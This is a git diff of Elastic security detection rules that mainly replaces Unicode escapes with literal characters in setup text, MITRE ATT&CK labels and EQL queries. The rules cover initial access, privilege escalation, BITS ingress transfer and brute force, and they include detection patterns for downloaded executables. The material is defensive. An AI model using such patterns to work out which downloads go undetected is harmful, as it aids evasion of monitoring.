b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json index c1c90bbeae0..1c21e53ad3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json index 3c279be1b5d..a1c1abeac67 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_105.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json index e73eb4305d3..bcb0bf24b76 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_106.json @@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json index ce6df191804..4ab5668a123 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_102.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json index 0be498041ce..6a4016116d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json index 37258546dd4..b9c134c050a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json index 607e1bb8d44..7991a7b4f00 100644 --- a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_105.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json index 63862545e50..f14cc1da2f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_104.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json index 013b80876a0..68ea97782c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_105.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json index 7598e264e74..34878eaf14e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_106.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json index 73c6f8f86c2..58b92c66918 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_107.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json index a73c5153bda..e82ecc578ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_108.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json index 1fe5a462a5c..ab23d7200db 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json index 9e4d5b264a7..be2c873b10d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_102.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json index 9bda6139a73..9e50bff82e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_103.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json index e8165f8cfb7..0ccf4b0a0c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f9590f47-6bd5-4a49-bd49-a2f886476fb9_104.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json index d864d3074fe..535bc38c33b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json index d84e4b021c3..fd8d1edd81b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json index 0b9a799d54d..f6162443e12 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json index 58c4538561c..e9af9978a38 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json b/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json index b3531efc5e7..b00e841da55 100644 --- a/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json index e1de7a5a759..f523f3c26ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts 